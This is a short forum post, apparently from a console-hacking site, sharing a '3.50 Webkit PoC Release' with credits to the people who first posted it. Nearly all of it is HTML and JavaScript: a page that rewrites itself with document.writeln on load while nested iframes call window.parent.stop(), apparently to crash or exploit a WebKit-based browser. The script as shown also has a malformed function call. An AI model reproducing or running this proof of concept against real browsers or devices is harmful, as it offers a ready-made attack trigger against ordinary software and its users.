.. Credits to Hunter128 for releasing it publicly first, and credits to Red-EyeX32 for linking it on the ShoutBox. Here is the 3.50 Webkit PoC Release:
<html>
<body onload='runTest()'>
<script>
function runTest(){
document.writeln('<html></html>'
;
}
</script>
<iframe src='1.html'></iframe>
</body>
</html>
<html>
<iframe src='2.html'></iframe>
<iframe src='3.html'></iframe>
</html>
<html>
<script>
window.parent.stop();
</script>
</html>
<html>
</html>


Copyright © 2026, NextGenUpdate.
All Rights Reserved.